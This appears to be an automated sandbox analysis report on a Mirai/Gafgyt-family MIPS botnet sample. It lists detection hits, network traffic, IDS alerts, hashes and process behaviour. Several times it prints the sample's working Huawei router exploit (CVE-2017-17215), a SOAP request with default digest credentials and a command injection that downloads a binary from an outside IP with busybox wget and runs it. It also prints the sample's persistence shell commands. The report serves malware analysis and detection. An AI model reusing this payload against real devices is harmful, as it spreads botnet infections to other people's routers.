65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknown TCP traffic detected without corresponding DNS query
          Source: 8lsvVMbYw7.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: 8lsvVMbYw7.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknown HTTP traffic detected:
          POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Connection: keep-alive
          Accept: */*
          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
          Content-Length: 457
          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknown DNS traffic detected: queries for: j.xnyidc.top

          System Summary

          Source: 8lsvVMbYw7.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: 8lsvVMbYw7.elf PID: 6211, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 8lsvVMbYw7.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: 8lsvVMbYw7.elf PID: 6211, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample .symtab present: no
          Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sample String containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sample String containing 'busybox' found: bin/busybox
          Source: Initial sample String containing 'busybox' found: /bin/busybox
          Source: Initial sample String containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdw5q6he3dbrsgmclkiu4to18npavj702f
          Source: classification engine Classification label: mal92.troj.linELF@0/0@2/0

          Persistence and Installation Behavior

          Source: /bin/sh (PID: 6218) Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /bin/sh (PID: 6216) Mkdir executable: /usr/bin/mkdir -> mkdir bin
          Source: /bin/sh (PID: 6218) Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /usr/bin/chmod (PID: 6218) File: /tmp/bin/watchdog (bits: - usr: rwx grp: rwx all: rwx)
          Source: /tmp/8lsvVMbYw7.elf (PID: 6213) Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/8lsvVMbYw7.elf bin/watchdog; chmod 777 bin/watchdog"
          Source: /bin/sh (PID: 6215) Rm executable: /usr/bin/rm -> rm -rf bin/watchdog

          Hooking and other Techniques for Hiding and Protection

          Source: unknown Network traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknown Network traffic detected: HTTP traffic on port 45328 -> 37215
          Source: unknown Network traffic detected: HTTP traffic on port 37215 -> 45328
          Source: unknown Network traffic detected: HTTP traffic on port 39438 -> 37215
          Source: unknown Network traffic detected: HTTP traffic on port 37918 -> 37215
          Source: unknown Network traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknown Network traffic detected: HTTP traffic on port 58096 -> 37215
          Source: unknown Network traffic detected: HTTP traffic on port 37215 -> 58096
          Source: unknown Network traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknown Network traffic detected: HTTP traffic on port 49508 -> 37215
          Source: /tmp/8lsvVMbYw7.elf (PID: 6211) Queries kernel information via 'uname':
          Source: 8lsvVMbYw7.elf, 6211.1.000055f113c26000.000055f113cad000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/mips
          Source: 8lsvVMbYw7.elf, 6211.1.000055f113c26000.000055f113cad000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
          Source: 8lsvVMbYw7.elf, 6211.1.00007ffcfa1dd000.00007ffcfa1fe000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
          Source: 8lsvVMbYw7.elf, 6211.1.00007ffcfa1dd000.00007ffcfa1fe000.rw-.sdmp Binary or memory string: nx86_64/usr/bin/qemu-mips/tmp/8lsvVMbYw7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/8lsvVMbYw7.elf

          Stealing of Sensitive Information

          Source: Yara match File source: 8lsvVMbYw7.elf, type: SAMPLE
          Source: Yara match File source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: 8lsvVMbYw7.elf, type: SAMPLE
          Source: Yara match File source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Scripting | Path Interception | Path Interception | 2 File and Directory Permissions Modification | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          No configs have been found
          [Behavior graph, ID: 830708. Sample: 8lsvVMbYw7.elf; start date: 20/03/2023; architecture: LINUX; score: 92. Process tree: 8lsvVMbYw7.elf starts sh (which starts chmod, rm, mkdir and mv) and further 8lsvVMbYw7.elf processes.]
          Source | Detection | Scanner | Label
          8lsvVMbYw7.elf | 61% | Virustotal |
          8lsvVMbYw7.elf | 64% | ReversingLabs | Linux.Trojan.Mirai

          No Antivirus matches

          Source | Detection | Scanner | Label
          j.xnyidc.top | 13% | Virustotal |

          No Antivirus matches

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          j.xnyidc.top | 156.224.24.249 | true | true | | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/soap/encoding/ | 8lsvVMbYw7.elf | false | | high
          http://schemas.xmlsoap.org/soap/envelope/ | 8lsvVMbYw7.elf | false | | high
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              131.124.97.114
              unknownUnited States
              15329UNASSIGNEDfalse
              197.200.106.225
              unknownAlgeria
              36947ALGTEL-ASDZfalse
              157.37.88.95
              unknownIndia
              55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              41.216.98.181
              unknownMauritius
              37006LiquidTelecommunicationRwandaRWfalse
              39.147.18.97
              unknownChina
              9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
              197.202.209.139
              unknownAlgeria
              36947ALGTEL-ASDZfalse
              157.227.53.36
              unknownAustralia
              4704SANNETRakutenMobileIncJPfalse
              197.109.110.86
              unknownSouth Africa
              37168CELL-CZAfalse
              178.40.173.81
              unknownSlovakia (SLOVAK Republic)
              6855SK-TELEKOMSKfalse
              187.60.245.182
              unknownBrazil
              28161PiernetTelecomBRfalse
              157.157.39.30
              unknownIceland
              6677ICENET-AS1ISfalse
              197.193.180.204
              unknownEgypt
              36992ETISALAT-MISREGfalse
              157.101.52.55
              unknownJapan27947TelconetSAECfalse
              41.83.26.215
              unknownSenegal
              8346SONATEL-ASAutonomousSystemEUfalse
              No created / dropped files found
              File type: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
              Entropy (8bit): 5.442327939522003
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name: 8lsvVMbYw7.elf
              File size: 84780
              MD5: 4db30b3742977f4175543bcc258bba08
              SHA1: d4934ed96152dfae36f4b9421b5f5b602f9ed6fe
              SHA256: 7e4dadf93fbb7a01b55eadacbb40ae8d5e95f5b9592e55f0fb2340d89fc78f17
              SHA512: 5d7111eb62f6758cdf57839190d451713a146931e0ce63975f02de2ab51d69f0122a59b9982138a2a62893e1256622822e73b1eaa077f1d0e45a74c53f0e0935
              SSDEEP: 768:2ty6IP7M/kq0INRhfuN2Eo9tl/de2YIwHKRH0I84EH6UTC7ZDYovZ73x/nL8y8QP:Rakdn2Eo3ePu5GTCRYo99Be037WQ/
              TLSH: C883A51E7E228FADF76D823147B74E25A69833C627E1D641E16CD6012E6034E641FFE8

              ELF header

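              | Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
              |---|---|---|---|---|---|---|---|---|---|---|
              | | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0 |
              | .init | PROGBITS | 0x400094 | 0x94 | 0x8c | 0x0 | 0x6 | AX | 0 | 0 | 4 |
              | .text | PROGBITS | 0x400120 | 0x120 | 0x115d0 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
              | .fini | PROGBITS | 0x4116f0 | 0x116f0 | 0x5c | 0x0 | 0x6 | AX | 0 | 0 | 4 |
              | .rodata | PROGBITS | 0x411750 | 0x11750 | 0x1f10 | 0x0 | 0x2 | A | 0 | 0 | 16 |
              | .ctors | PROGBITS | 0x454000 | 0x14000 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
              | .dtors | PROGBITS | 0x454008 | 0x14008 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
              | .data.rel.ro | PROGBITS | 0x454014 | 0x14014 | 0x44 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
              | .data | PROGBITS | 0x454060 | 0x14060 | 0x3a0 | 0x0 | 0x3 | WA | 0 | 0 | 16 |
              | .got | PROGBITS | 0x454400 | 0x14400 | 0x498 | 0x4 | 0x10000003 | WAp | 0 | 0 | 16 |
              | .sbss | NOBITS | 0x454898 | 0x14898 | 0x1c | 0x0 | 0x10000003 | WAp | 0 | 0 | 4 |
              | .bss | NOBITS | 0x4548c0 | 0x14898 | 0x2250 | 0x0 | 0x3 | WA | 0 | 0 | 16 |
              | .mdebug.abi32 | PROGBITS | 0x9c6 | 0x14898 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 1 |
              | .shstrtab | STRTAB | 0x0 | 0x14898 | 0x64 | 0x0 | 0x0 | | 0 | 0 | 1 |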
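              | Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
              |---|---|---|---|---|---|---|---|---|---|---|---|
              | LOAD | 0x0 | 0x400000 | 0x400000 | 0x13660 | 0x13660 | 5.5801 | 0x5 | R E | 0x10000 | | .init .text .fini .rodata |
              | LOAD | 0x14000 | 0x454000 | 0x454000 | 0x898 | 0x2b10 | 3.8882 | 0x6 | RW | 0x10000 | | .ctors .dtors .data.rel.ro .data .got .sbss .bss |
              | GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | | |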
              | Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
              |---|---|---|---|---|---|---|---|
              | 03/20/23-16:21:16.976524 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 53672 | 37215 | 192.168.2.23 | 93.94.199.119 |
              | 03/20/23-16:21:34.558345 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 39438 | 37215 | 192.168.2.23 | 94.187.107.90 |
              | 03/20/23-16:21:45.948271 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 37918 | 37215 | 192.168.2.23 | 203.6.74.105 |
              | 03/20/23-16:20:44.511900 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 43281 | 53 | 192.168.2.23 | 8.8.8.8 |
              | 03/20/23-16:21:24.722739 | TCP | 2030489 | ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response | 56999 | 47796 | 156.224.24.249 | 192.168.2.23 |
              | 03/20/23-16:22:44.755597 | TCP | 2030489 | ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response | 56999 | 47806 | 156.224.24.249 | 192.168.2.23 |
              | 03/20/23-16:22:30.124421 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 49508 | 37215 | 192.168.2.23 | 197.234.43.110 |
              | 03/20/23-16:21:23.129262 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 45328 | 37215 | 192.168.2.23 | 41.36.73.52 |
              | 03/20/23-16:21:34.964696 | TCP | 2030490 | ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) | 47806 | 56999 | 192.168.2.23 | 156.224.24.249 |
              | 03/20/23-16:22:16.668019 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 58096 | 37215 | 192.168.2.23 | 197.39.71.73 |
              | 03/20/23-16:22:02.177570 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 42520 | 37215 | 192.168.2.23 | 86.71.8.242 |
              | 03/20/23-16:20:45.109110 | TCP | 2030490 | ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) | 47796 | 56999 | 192.168.2.23 | 156.224.24.249 |
              | 03/20/23-16:22:19.853858 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 47896 | 37215 | 192.168.2.23 | 192.107.143.159 |
              | 03/20/23-16:21:34.369876 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 46438 | 53 | 192.168.2.23 | 8.8.8.8 |
              | Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
              |---|---|---|---|---|---|---|---|---|
              | Mar 20, 2023 16:20:44.511899948 CET | 192.168.2.23 | 8.8.8.8 | 0xbd46 | Standard query (0) | j.xnyidc.top | A (IP address) | IN (0x0001) | false |
              | Mar 20, 2023 16:21:34.369875908 CET | 192.168.2.23 | 8.8.8.8 | 0x9d8a | Standard query (0) | j.xnyidc.top | A (IP address) | IN (0x0001) | false |

              | Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
              |---|---|---|---|---|---|---|---|---|---|---|
              | Mar 20, 2023 16:20:44.889858007 CET | 8.8.8.8 | 192.168.2.23 | 0xbd46 | No error (0) | j.xnyidc.top | | 156.224.24.249 | A (IP address) | IN (0x0001) | false |
              | Mar 20, 2023 16:21:34.751024961 CET | 8.8.8.8 | 192.168.2.23 | 0x9d8a | No error (0) | j.xnyidc.top | | 156.224.24.249 | A (IP address) | IN (0x0001) | false |

              System Behavior

              | Start time | Start date | Path | Arguments | File size | MD5 hash |
              |---|---|---|---|---|---|
              | 16:20:43 | 20/03/2023 | /tmp/8lsvVMbYw7.elf | /tmp/8lsvVMbYw7.elf | 5777432 bytes | 0083f1f0e77be34ad27f849842bbb00c |
              | 16:20:43 | 20/03/2023 | /tmp/8lsvVMbYw7.elf | n/a | 5777432 bytes | 0083f1f0e77be34ad27f849842bbb00c |
              | 16:20:43 | 20/03/2023 | /bin/sh | sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/8lsvVMbYw7.elf bin/watchdog; chmod 777 bin/watchdog" | 129816 bytes | 1e6b1c887c59a315edb7eb9a315fc84c |
              | 16:20:43 | 20/03/2023 | /bin/sh | n/a | 129816 bytes | 1e6b1c887c59a315edb7eb9a315fc84c |
              | 16:20:43 | 20/03/2023 | /usr/bin/rm | rm -rf bin/watchdog | 72056 bytes | aa2b5496fdbfd88e38791ab81f90b95b |
              | 16:20:43 | 20/03/2023 | /bin/sh | n/a | 129816 bytes | 1e6b1c887c59a315edb7eb9a315fc84c |
              | 16:20:43 | 20/03/2023 | /usr/bin/mkdir | mkdir bin | 88408 bytes | 088c9d1df5a28ed16c726eca15964cb7 |
              | 16:20:43 | 20/03/2023 | /bin/sh | n/a | 129816 bytes | 1e6b1c887c59a315edb7eb9a315fc84c |
              | 16:20:43 | 20/03/2023 | /usr/bin/mv | mv /tmp/8lsvVMbYw7.elf bin/watchdog | 149888 bytes | 504f0590fa482d4da070a702260e3716 |
              | 16:20:43 | 20/03/2023 | /bin/sh | n/a | 129816 bytes | 1e6b1c887c59a315edb7eb9a315fc84c |
              | 16:20:43 | 20/03/2023 | /usr/bin/chmod | chmod 777 bin/watchdog | 63864 bytes | 739483b900c045ae1374d6f53a86a279 |
              | 16:20:43 | 20/03/2023 | /tmp/8lsvVMbYw7.elf | n/a | 5777432 bytes | 0083f1f0e77be34ad27f849842bbb00c |
              | 16:20:43 | 20/03/2023 | /tmp/8lsvVMbYw7.elf | n/a | 5777432 bytes | 0083f1f0e77be34ad27f849842bbb00c |
              | 16:20:43 | 20/03/2023 | /tmp/8lsvVMbYw7.elf | n/a | 5777432 bytes | 0083f1f0e77be34ad27f849842bbb00c |